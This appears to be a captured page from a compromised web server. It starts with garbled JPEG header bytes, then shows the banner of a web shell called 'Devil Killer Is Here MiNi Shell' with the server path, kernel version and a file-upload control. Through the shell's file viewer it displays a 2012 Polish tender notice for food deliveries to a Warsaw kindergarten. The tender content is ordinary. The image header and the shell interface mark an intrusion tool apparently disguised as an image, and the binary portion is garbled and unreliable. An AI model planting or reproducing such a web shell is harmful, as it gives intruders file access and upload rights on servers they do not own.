JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121203/484198-N-2012.html

<p class="kh_header"><b>Warszawa: NA DOSTAWĘ
ARTYKUŁÓW SPOŻYWCZYCH 
Z PODZIAŁEM NA 10 PAKIETÓW</b><br>
<b>Numer ogłoszenia: 484198 - 2012; data zamieszczenia: 03.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 4 , ul. Elektoralna 15/17, 00-137 Warszawa, woj. mazowieckie, tel. 22 620 42 46, faks 22 620 42 46.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole4.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NA DOSTAWĘ
ARTYKUŁÓW SPOŻYWCZYCH 
Z PODZIAŁEM NA 10 PAKIETÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> NA DOSTAWĘ
ARTYKUŁÓW SPOŻYWCZYCH 
Z PODZIAŁEM NA 10 PAKIETÓW:
1) Pieczywo, pieczywo cukiernicze
2) Artykuły mleczarskie
3) Warzywa i owoce krajowe
4) Owoce i cytrusy importowane
5) Mięso i wędliny
6) Mrożonki
7) Ryby
8) Artykuły ogólnospożywcze
9) Jaja
10) Woda.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.81.00.00-9, 15.33.11.00-8, 03.31.10.00-2, 03.14.25.00-3, 41.11.00.00-3, 03.22.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole4.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole nr 4 00-137 Warszawa ul. Elektoralna 15/17..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 10:00, miejsce: Przedszkole nr 4 00-137 Warszawa ul. Elektoralna 15/17..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo, wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb baltonowski krojony 400 g - 500 g	
Szt	
850

Chleb razowy krojony 400 g	
Szt	
200

Chleb razowy ze słonecznikiem krojony 400g	
Szt	
150

Chałka 300g	
Szt	
140

Grahamki 30g	
Szt	
3700

Bułka paryska 300g krojona	
Szt	
750

Kajzerki 30 g	
Szt	
3200

Bułka tarta 0,5 kg	
Szt	
120

Bułeczki maślane 80 g -100 g 	
Szt
	
400

Drożdżówka z jabłkiem, 100 g -120 g	
Szt
	
400

Drożdżówka z serem, 100 g -120 g	
Szt
	
500

Drożdżówka z budyniem, 100 g -120 g	
Szt
	
400

Pączki liliputy, małe 	
Kg
	
50

Pączki z marmoladą  100 g -120 g	
Szt	
250

Jagodzianki, 100 g -120 g	
Szt	
240.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykuły mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko pasteryzowane w  folii 1 litr 3,2% tłuszczu	
Litr	
1750

Mleko pasteryzowane w  folii 1 litr 3,2% tłuszczu z dopłatą	
Litr	
1750

Mleko UHT 3,2% tłuszczu 	
Litr	
200

Mleko UHT 3,2% tłuszczu z dopłatą	
Litr	
200

Masło świeże w kostkach op. 200 g o zawartości tłuszczu mlecznego min 40% typu ostrołęckiego	
Szt	
1200

Śmietana 18% tłuszczu w opakowaniach plastik op. 400g	
Szt	
900

Ser twarogowy półtłusty	
Kg	
450

Ser topiony śmietankowy w bloczkach op. 100g	
Szt	
150

Ser żółty Gouda tłusty	
Kg	
65

Ser żółty Gouda tłusty z dopłatą	
Kg	
65

Serek homogenizowany waniliowy op. 150 g	
Szt	
1800

Deser budyniowy op. 100g typu monte	
Szt	
1500

Jogurt owocowy z syropem op. 130-150g (NIETERMIZOWANY)	
Szt	
1000

Jogurt pitny op. 100g typu actimel	
Szt	
1500

Jogurt naturalny op.470- 500g minimum 2% tłuszczu	
Szt	
400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa, owoce krajowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuł świeży, gat. I	
Szt	
100


Cebula biała, świeża, gat. I	
Kg	
100

Czosnek, gat. I	
Szt	
150

Kalafior, świeży, gat. I	
Szt	
30

Kapusta biała w główkach, świeża, gat. I	
Kg	
50


Kapusta kiszona, gat. I	
Kg	
80

Kapusta pekińska , świeża, gat. I	
Kg	
200

Kapusta włoska, świeża, gat. I	
Kg	
40

Kapusta czerwona,  świeża, gat. I	
Kg	
40

Koper świeży, gat. I	
Szt	
150

Marchew, świeża, gat. I	
Kg	
260


Natka, świeża, gat. I	
Szt	
170

Ogórek świeży, gat. I	
Kg	
140

Ogórek kiszony, gat. I	
Kg	
200

Ogórek małosolny, świeży, gat. I	
kg	  
30

Papryka czerwona, świeża, gat. I	
Kg	
110

Pieczarki, świeże, gat. I	
Kg	
60

Pietruszka, świeża, gat. I	
Kg	
30

Pomidory, świeże, gat. I	
Kg	
150

Pory, świeże, średnica minimum 3 cm, gat. I	
Szt	
20

Rzodkiewka, świeża, gat. I	
Szt	
150

Sałata, świeża, gat. I	
Szt	
100

Cykoria, świeża, gat. I	
Kg 	
5

Sałata lodowa, świeża, gat. I	
Szt	
60

Seler korzeniowy świeży, gat. I	
Kg	
30

Szczypiorek, świeży, gat. I	
Szt	
80

Ziemniaki młode, gat. I	
Kg
	
500

Ziemniaki późne sypkie, białe, gat. I (preferowane odmiany irga, irys)	
Kg	
3200

Brzoskwinia krajowa, świeża, gat. I	
Kg	
50

Gruszki, świeże, gat. I	
Kg	
200

Jabłka świeże, soczyste, słodkie,  gat. I	
Kg	
700

Maliny w opakowaniu tekturowym 500g, świeże, gat. I	
Szt
	
60

Morele krajowe, świeże, gat. I	
Kg	
30

Truskawki, pakowane w łubianki  świeże, gat. I	
Kg	
140

Śliwki, świeże, słodkie, gat. I	
Kg	
100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Cytrusy i owoce importowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz, dojrzały, słodki, świeży, gat.I	
Kg
	
120

Banany, bez plam , gat.I	
Kg	
500

Brzoskwinie świeże, słodkie, soczyste, gat.I	
Kg
	
50

Cytryny, gat.I	
Kg	
20

Kaki, gat. I dojrzałe, słodkie	
Szt	
100

Kiwi dojrzałe, słodkie, gat.I
	
Szt	
800

Mandarynki, słodkie, soczyste, gat.I	
Kg
	
200

Nektarynki świeże, słodkie, soczyste, gat.I	
Kg
	
50

Pomarańcze słodkie, soczyste, gat.I	
Kg	
50

Winogrona małe bezpestkowe, jasne, ciemne różowe gat. I	
Kg	
250

Winogrona jasne, ciemne różowe, słodkie, gat.I	
Kg	
100

Melon słodki, soczysty, gat.I	
Kg	 
35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mięso, wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso z piersi indyka bez skóry, gat. I	
Kg	
140

Mięso z piersi kurczaka bez skóry, gat. I	
Kg	
200

Udka (pałki) z kurczaka, gat. I	
Kg	
130

Szyja indycza, gat. I	
Kg	
250

Schab wieprzowy środkowy, gat. I	
Kg	
80

Wieprzowina łopatka, gat. I	
Kg	
60

Wieprzowina szynka surowa, gat. I	
Kg	
160

Szponder wołowy, rosołowy, gat. I	
Kg 	
30

Kiełbasa krakowska, gat. I	
Kg	
50

Parówki wieprzowe lub drobiowe (zawartość mięsa wieprzowego, drobiowego, cielęcego, minimum 80%) typu sokołów, gat. I	
Kg
	
90

Kiełbasa podwawelska, gat. I	
Kg	
40

Kiełbasa żywiecka, gat. I	
Kg	
40

Mielonka tyrolska, gat. I	
Kg	
20

Polędwica sopocka, gat. I	
Kg	
70

Szynka z piersi indyka, gat. I	
Kg	
30

Szynka wieprzowa delikatesowa bez tłuszczu, gat. I	
Kg	
40

Szynkowa wieprzowa, gat. I	
Kg	
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły, opakowanie nie większe niż 2500 g,  gat. I	
Kg
	
60

Bukiet warzyw, opakowanie nie większe niż 2500 g,  gat. I	
Kg
	
30

Buraki mrożone wiórki, opakowanie 450g - 500 g, gat. I	
Kg
	
220

Fasolka szparagowa, opakowanie nie większe niż 2500 g, gat. I	
Kg
	
50

Kalafior mrożony, opakowanie nie większe niż 2500 g,gat. I	
Kg
	
50

Marchewka z groszkiem, opakowanie nie większe niż 2500 g, gat. I	
Kg	
100

Mieszanka kompotowa, opakowanie nie większe niż 2500 g, 
gat. I	
Kg
	
250

Marchewka mini, opakowanie nie większe niż 2500 g ,gat. I	
Kg
	
40

Mieszanka warzywna, opakowanie nie większe niż 2500 g ,
gat. I	
Kg
	
120

Porzeczka czarna, opakowanie nie większe niż 2500 g , gat. I	
Kg
	
100

Śliwki bez pestek, opakowanie nie większe niż 2500 g ,gat. I	
Kg
	
40

Truskawki, opakowanie nie większe niż 2500 g , gat. I	
Kg
	
250

Włoszczyzna krojona, opakowanie nie większe niż 2500 g , 
gat. I	
Kg
	
450.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mintaj mrożony,  filety mrożone pojedynczo, nie więcej niź 3% glazury technologicznej, I gat.  	
kg	
50

Makrela wędzona świeża, gat.I	
kg	
50

Dorsz filet bez skóry, bez ości, nie więcej niź 3% glazury technologicznej, gat.I	
kg	
120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Artykuły ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas plastry w syropie puszka 650g, gat. I	
Szt	
250

Bazylia op. 10 g-15g	
Szt
	
50

Barszcz biały w proszku, op.66 g	
szt	
300

Biszkopty, gat. I	
Kg	
20

Brzoskwinia-połówki w syropie puszka 850 g	
Szt	
280

Budyń waniliowy lub śmietankowy, bez sztucznych barwników, z cukrem, op. 60 g, gat. I 	
Szt	
300

Cynamon , op. 10 g -15 g 	
Szt	
20

Chrzan w słoikach 300 g , bez dodatku octu	
Szt	
20

Ciasteczka kruche, gat. I	
Kg	
50

Cukier op. 1000 g  gat. I	
Kg
	
600

Cukier puder, op. 400 g	
Szt	
60

Cukier waniliowy, op.32 g	
Szt	
250

Cukierki czekoladowe i czekoladowe z galaretką	
Kg	
60

Drożdże instant, op. 7 g. gat.I	
Szt	
100

Dżem owocowy z zawartością owocu 45 g w 100 g wyrobu gotowego słoik ok. 280 g, różne smaki 	
Szt	
250


Groch nasiona suche	
Kg	
35


Galaretka owocowa, bez sztucznych barwników, różne smaki, op. papierowe, min.75 g.
	
Szt	
100

Groszek konserwowy w puszce,  400 g.  gat. I	
Szt
	
50

Herbata czarna ekspresowa, typu lipton, op.100 szt.	
Szt	
20


Herbata owocowa ekspresowa hibiskus,owoce leśne, malina, wieloowocowa op. 20 szt	
Szt	
100

Jajko czekoladowe z niespodzianką w środku typu kinder	
Szt
	
800

Kasza jęczmienna perłowa op. 1000 g, gat.I	
Kg	
80

Kakao proszek, op. 100g, o obniżonej zawartości tłuszczu, 11% tłuszczu kakaowego, typu wedel	
Szt	
90

Kasza gryczana op. 1000g , gat.I	
Kg	
50


Kasza manna op. 1000 g, gat.I	
Kg	
20

Kawa zbożowa rozpuszczalna, op. 150g	
Szt	
50

Ketchup o zawartości pomidorów 45 g na 100g  bez konserwantów, łagodny, op. 480 g
	
Szt	
60


Koncentrat buraczany, op. 300 ml., do sporządzenia 4-6 litrów gotowego barszczu, typu krakus, gat.I
	
Szt	
80

Kisiel bez konserwantów i sztucznych barwników op.77 g. 
gat. I	
Szt
	
120

Koncentrat pomidorowy, bez konserwantów, bez dodatków, zawartość ekstraktu 30%, min.190 g
	
Szt	
300

Krakersy, op. 180g, typu lajkonik	
Szt
	
40

Kukurydza konserwowa w puszce, bez cukru, op. 425 g	
Szt	
70


Kwasek cytrynowy, min 20 g.	
Szt 	
50

Liście laurowe, op. 6g -10 g	
Szt	
40

Majeranek op. 10g-15 g	
Szt	
100

Majonez, op. 400g w słoiku , bez konserwantów, gat. I	
Szt	
70

Makaron z pszenicy durum 100%, op. 400 g lub  500 g. różne formy	
Kg
	
160

Mąka ziemniaczana, op.1000 g, gat.I	
Kg
	
20

Mąka pszenna, op.1000 g, gat.I	
Kg	
300


Mięta ekspresowa op. 20 szt	
Szt	
30

Miód pszczeli naturalny, gat.I	
Kg	
30

Krem czekoladowo - orzechowy, op. 420g, typu nutella	
Szt	
40

Oregano, op. 10 g	
Szt	
30

Olej rzepakowy z pierwszego tłoczenia butelka. 1 litr	
Litr	
230

Papryka słodka w proszku op. 10g - 20 g	
Szt	
50

Oliwa z oliwek z pierwszego tłoczenia, butelka szklana,  500 ml 	
Szt. 	
10

Paluszki słone, op. 150g	
Szt	
80

Pieprz prawdziwy mielony, op. 10-20 g	
Szt	
60

Płatki czekoladowe lub cynamonowe op. 500 g typu nesquick	
Szt	
180

Pieprz ziołowy op. 10 -20 g.	
Szt	
20

Proszek do pieczenia op. 30 g 	
Szt
	
20

Płatki owsiane błyskawiczne, op. 500g	
Szt	
20

Płatki ryżowe op. 500 g	
Szt	
20

Ptasie mleczko typu wedel op. 420g	
Szt	
500

Przyprawa warzywna do potraw bez sztucznych dodatków, 
bez wzmacniaczy smaku, barwników,  typu podravka-natur opak. 150g
	
Szt	
100

Rodzynki op. 200 g	
Szt	
50

Ryż biały długoziarnisty I klasa 	
Kg	
90

Sok owocowy 100%, bez konserwantów, bez barwników, bez cukru, op. 0,2 l	
Szt	
1200

Sok owocowy 100%, bez konserwantów, bez barwników, bez cukru, op. 1 l	
Szt	
500

Przecier pomidorowy 500g , pomidory 99.5%, bez konserwantów, typu pudliszki
	
Szt
	
100

Sos do spaghetti z minimalną zawartością pomidorów 22%, typu łowicz słoik, op. 350g
	
Szt	
200


Sól kamienna op. 1000g	
Kg	
50

Szczaw konserwowy, op. słoik 350g, gat I	
Szt	
120

Suszone morele,  gat.I	
Kg	
50

Syrop owocowy, zawartość ekstraktu nie mniej niż 62%, 
bez konserwantów, butelka szklana 420 ml. 	
Szt 	
70

Tymianek op. 10 g -15 g	
Szt
	
50

Wafel oblewany czekoladą typu prince-polo, 36 g	
Szt
	
800


Woda niegazowana but. plastikowe, 1,5 litra	
Szt	
300

Zacierki op. 250g	
Szt	
80

Ziele angielskie op. 10 g -15 g	
Szt	
40

Zioła prowansalskie  op. 10-15 g.	
Szt
	
20

